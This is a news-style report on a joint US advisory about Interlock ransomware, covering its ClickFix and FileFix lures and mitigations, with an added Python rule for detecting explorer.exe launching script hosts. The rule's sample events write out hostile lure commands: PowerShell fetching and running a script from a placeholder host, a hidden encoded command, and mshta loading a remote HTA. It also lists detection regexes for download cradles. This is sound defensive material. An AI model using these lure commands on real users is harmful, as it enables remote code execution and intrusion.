#StopRansomware: CISA and FBI Warn of Surging Interlock Ransomware Attacks That Hit US Healthcare Giants
The Cybersecurity and Infrastructure Security Agency (CISA) and the FBI, together with the Department of Health and Human Services (HHS) and the Multi-State Information Sharing and Analysis Center (MS-ISAC), have issued a joint advisory warning of a surge in attacks across the United States by the Interlock ransomware group, which uses a double extortion strategy against companies and critical infrastructure entities.
The advisory provides up-to-date indicators of compromise (IOCs) identified during recent incident investigations, including incidents reported as recently as June 2025. Beyond the technical evidence of intrusion, it describes the tactics, techniques, and procedures the actors currently use and gives specific recommendations for mitigating their impact.
Interlock is a relatively new threat actor; its first observed attacks date back to September 2024. Since then, the group has expanded beyond the United States, targeting organizations across a range of sectors. Healthcare has been disproportionately affected, likely because hospitals and clinics depend on uninterrupted access to their digital infrastructure and therefore face intense pressure to restore operations quickly.
Interlock has previously been linked to ClickFix campaigns, in which victims are lured (for example by a fake CAPTCHA or browser-update page) into copying and running a command themselves, with the payload disguised as a legitimate IT tool, to give the attackers initial access to corporate environments. The group has also been associated with the NodeSnake remote access trojan, which was deployed against the IT networks of British universities.
Among the group's most recent targets are major U.S. healthcare providers. DaVita, a Fortune 500 company specializing in kidney care, suffered a breach in which the attackers claimed to have exfiltrated and published 1.5 terabytes of data. Kettering Health, a large healthcare network with more than 120 outpatient facilities and over 15,000 staff, was also compromised.
The FBI also highlighted Interlock's use of an initial access vector that is uncommon among ransomware operators: in several cases the malicious payload was delivered by drive-by download from compromised but otherwise legitimate websites.
Interlock's modus operandi is double extortion: sensitive data is first exfiltrated from compromised systems, and the systems are then encrypted. The victim is pressured twice over, once to pay for a decryptor and again to pay to prevent publication of the stolen data.
In July 2025, researchers identified a newer social engineering variant dubbed FileFix, which abuses trusted Windows interfaces such as the File Explorer address bar and HTML Applications (HTA). The victim is talked into pasting what looks like a file path into File Explorer, but the pasted string is actually a PowerShell command with the fake path hidden behind a comment character, or into opening an HTA file whose embedded JavaScript runs under mshta.exe. Either way the code executes under the user's account without the download or macro warnings a conventional lure would trigger, giving the attackers remote access to the system and a foothold for further malware deployment.
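Both the ClickFix campaigns mentioned earlier and FileFix end the same way on the endpoint: the user pastes attacker-supplied text into a trusted Windows surface (the Win+R Run dialog for ClickFix, the File Explorer address bar for FileFix) and explorer.exe spawns a script host that runs it. That parent/child pair plus a few command-line indicators is a usable detection signal. The following is an added example, not code from the advisory, the article, or any vendor; the field names, indicator regexes, URLs and every sample event are constructed for illustration and should be tuned to your own telemetry (Sysmon Event ID 1 and Windows Security event 4688 both carry these fields):

```python
"""Heuristic detection of ClickFix / FileFix execution chains.

Added example (not from the CISA/FBI advisory). ClickFix and FileFix both end
with explorer.exe spawning a script host to run user-pasted text, so the rule
keys on that parent/child pair plus command-line indicators. Field names,
indicators and sample events are constructed for this example.
"""
import re
from dataclasses import dataclass

# Script hosts that explorer.exe should rarely launch with a complex command line.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
                "wscript.exe", "cscript.exe"}

# Command-line indicators, checked in this order. The FileFix lure appends
# "# C:\plausible\path.docx" so the address bar shows only a file path while
# PowerShell treats everything after '#' as a comment.
INDICATORS = {
    "download_cradle": re.compile(
        r"(?i)\b(invoke-webrequest|iwr|downloadstring|downloadfile|curl|wget|start-bitstransfer)\b"),
    "remote_url": re.compile(r"(?i)https?://"),
    "encoded_command": re.compile(
        r"(?i)\s-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}"),
    "hidden_window": re.compile(
        r"(?i)-(w|windowstyle)\s+hidden|-nop\b|-noprofile\b"),
    "filefix_comment_path": re.compile(r"#\s*[A-Za-z]:\\[^\"']+$"),
}


@dataclass
class ProcessEvent:
    """Minimal process-creation record (constructed field names)."""
    parent_image: str
    image: str
    command_line: str


def image_name(path: str) -> str:
    """Return the lower-cased file name from a Windows image path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze(event: ProcessEvent) -> list[str]:
    """Indicator names matched by an explorer.exe -> script host chain,
    or [] when the event does not fit the pattern at all."""
    if image_name(event.parent_image) != "explorer.exe":
        return []
    if image_name(event.image) not in SCRIPT_HOSTS:
        return []
    return [name for name, rx in INDICATORS.items()
            if rx.search(event.command_line)]


def triage(events: list[ProcessEvent]) -> list[tuple[int, list[str]]]:
    """(index, indicators) for every event that should raise an alert.
    A bare explorer.exe -> powershell.exe launch (a user opening a console)
    is not alerted on its own; at least one indicator is required."""
    return [(i, hits) for i, e in enumerate(events) if (hits := analyze(e))]


# Constructed sample telemetry; the .invalid TLD guarantees the URLs are unreal.
SAMPLE_EVENTS = [
    # FileFix: command pasted into the File Explorer address bar, fake path after '#'
    ProcessEvent(
        r"C:\Windows\explorer.exe",
        r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        r'powershell.exe -c "iwr http://update.example.invalid/u.ps1 -OutFile $env:TEMP\u.ps1; & $env:TEMP\u.ps1" # C:\company\internal-secure\filedrive\HRPolicy.docx'),
    # ClickFix: fake-CAPTCHA command run from the Win+R dialog
    ProcessEvent(
        r"C:\Windows\explorer.exe",
        r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "powershell.exe -w hidden -nop -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"),
    # ClickFix variant: mshta pulling a remote HTA
    ProcessEvent(
        r"C:\Windows\explorer.exe",
        r"C:\Windows\System32\mshta.exe",
        "mshta.exe https://cdn.example.invalid/verify.hta"),
    # Benign: an administrator opened PowerShell from the Start menu
    ProcessEvent(
        r"C:\Windows\explorer.exe",
        r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"'),
    # Out of scope for this rule: encoded command, but the parent is cmd.exe
    ProcessEvent(
        r"C:\Windows\System32\cmd.exe",
        r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "powershell.exe -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"),
]

if __name__ == "__main__":
    for idx, hits in triage(SAMPLE_EVENTS):
        print(f"ALERT event[{idx}]: {', '.join(hits)}")
```

Run directly, the script alerts on the first three events only. The Start-menu launch is deliberately left alone so the rule does not page on every administrator opening a console, and the cmd.exe-parented encoded command is left to a separate rule so this one stays specific to the explorer.exe chain that ClickFix and FileFix produce.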
To reduce the likelihood of infection and extortion, organizations are advised to implement DNS request filtering and to enforce web access through web access firewalls, so that drive-by downloads and lure pages are blocked before they reach users. Equally critical is staff training: personnel should learn to recognize social engineering ploys, including fake CAPTCHA or "fix" prompts that ask them to paste a command, as well as phishing attempts.
Technical safeguards must include prompt patching and updating of all IT infrastructure components, from operating systems and applications to firmware, with priority given to known exploited vulnerabilities. Segmenting the corporate network into isolated zones limits lateral movement and helps contain an intrusion to the segment that was breached.
Additional resilience comes from robust identity, credential, and access management (ICAM) policies, most notably requiring multi-factor authentication for all internal and external services wherever feasible, so that stolen credentials alone are not enough for the actors to move from an initial foothold to the rest of the environment.